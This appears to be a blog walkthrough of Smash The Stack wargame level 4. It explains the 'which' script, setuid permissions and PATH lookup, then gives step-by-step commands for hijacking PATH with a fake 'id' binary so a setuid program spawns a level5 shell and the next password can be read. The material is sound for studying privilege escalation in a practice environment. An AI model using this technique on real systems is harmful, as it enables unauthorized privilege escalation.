Smash The Stack – Level 4

LEVEL 4
Today i’ve learned how to does the “which” command works.

Lets see what does the which command do:

PROGRAM: which.sh

#! /bin/sh
set -ef

if test -n "$KSH_VERSION"; then
puts() {
print -r -- "$*"
}
else
puts() {
printf '%s\n' "$*"
}
fi

ALLMATCHES=0

while getopts a whichopts
do
case "$whichopts" in
a) ALLMATCHES=1 ;;
?) puts "Usage: $0 [-a] args"; exit 2 ;;
esac
done
shift $(($OPTIND - 1))

if [ "$#" -eq 0 ]; then
ALLRET=1
else
ALLRET=0
fi
case $PATH in
(*[!:]:) PATH="$PATH:" ;;
esac
for PROGRAM in "$@"; do
RET=1
IFS_SAVE="$IFS"
IFS=:
case $PROGRAM in
*/*)
if [ -f "$PROGRAM" ] && [ -x "$PROGRAM" ]; then
puts "$PROGRAM"
RET=0
fi
;;
*)
for ELEMENT in $PATH; do
if [ -z "$ELEMENT" ]; then
ELEMENT=.
fi
if [ -f "$ELEMENT/$PROGRAM" ] && [ -x "$ELEMENT/$PROGRAM" ]; then
puts "$ELEMENT/$PROGRAM"
RET=0
[ "$ALLMATCHES" -eq 1 ] || break
fi
done
;;
esac
IFS="$IFS_SAVE"
if [ "$RET" -ne 0 ]; then
ALLRET=1
fi
done

exit "$ALLRET"

In this code it searches in $PATH which is an Unix Environmental
variable.
$PATH: Contains a colon-separated list of directories that the
shell searches for commands that do not contain a slash in their
name. Keep PATH in your mind.

So this is our question:


#include
int main()
{
system("id");
return 0;
}

When you execute this program, it prints the id: the real and the
effective user and group ID.


$./level04
uid=1004(level4) gid=1004(level4) euid=1005(level5) groups=1005(level5),1004(level4),1029(nosu)

see, system call is similar to running a command in terminal.
system() executes a command specified in string by calling
/bin/sh -c string, and returns after the command has been
completed. During execution of the command, SIGCHLD will be
blocked, and SIGINT and SIGQUIT will be ignored.

If you notice the permissions of the executable file
you could find a ‘s’ in the place of x of the owner’s
permission.


$ls -l /levels/level04
-r-sr-x--- 1 level5 level4 7016 Nov 16 2007 /levels/level04

On an executable program with set-UID or set-groupID, that program
runs with the effective permissions of its owner or group.

For a directory, the set-groupID flag means that all files created
inside that directory will inherit the group of the directory.
Without this flag, a file takes on the primary group of the user
creating the file. This property is important to people trying to
maintain a directory as group accessible. The subdirectories also
inherit the set-groupID property.

So if we get a shell from this executable file, that shell will
be of level5.

We cannot solve this using buffer overflow. Since there is any
function which contains a system call to a shell. So we have to
do something else.

In STS if you have noticed we can make a file or folder only
inside the /tmp


level4@io:~$ ls -l /
total 152
drwxr-xr-x 2 root root 4096 Aug 1 22:47 bin
drwx------ 2 root root 4096 Oct 28 2006 boot
drwxr-xr-x 5 root root 4096 Aug 2 17:01 dev
drwx--x--x 73 root root 4096 Aug 13 16:21 etc
drwx--x--x 38 root root 4096 Aug 13 08:15 home
drwx------ 2 root root 4096 Apr 24 2007 initrd
drwxr-xr-x 3 root root 4096 Aug 13 08:20 levels
drwxr-xr-x 10 root root 12288 Aug 1 23:04 lib
drwx------ 2 root root 4096 Apr 24 2007 media
drwx------ 2 root root 4096 Oct 28 2006 mnt
drwxr-xr-x 2 root root 4096 Apr 24 2007 opt
dr-xr-x--x 92 root root 0 Aug 2 17:00 proc
-rw-r--r-- 1 root root 0 Aug 2 17:00 reboot
drwx------ 15 root root 4096 Oct 27 19:58 root
drwxr-xr-x 2 root root 4096 Aug 1 23:01 sbin
drwxr-xr-x 2 root root 4096 Sep 16 2008 selinux
drwx------ 2 root root 4096 Apr 24 2007 srv
drwxr-xr-x 3 root root 0 Aug 2 17:00 sys
drwx-wx-wt 186 root root 73728 Oct 29 14:14 tmp
drwxr-xr-x 11 root root 4096 Aug 1 22:54 usr
drwxr-xr-x 15 root root 4096 Mar 2 2011 var

Make a folder named sys inside /tmp and also make a file
id.c.

Note: you can name the folder as your wish.


$mkdir /tmp/sys && cd /tmp/sys/ && vim id.c

Now create a simple program which contains a system call
and it calls a sh (/bin/sh). Give any name to the program
i gave bla.c, but while compiling make an output file
named ‘id’.


$gcc bla.c -o id

Do you remember the PATH variable I’ve mentioned at the
begining of this level. Make use of it to set the path as
/tmp/sys.


$PATH=/tmp/sys

Then execute the level04 executable file. Now you will get
a SHELL and set the defualt PATH just immedeatly after
getting a shell. Then check the ‘id’ of the new shell. You
can find it as level 5.

Please find the password for the next level from
/home/level5/.pass

Advertisements

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s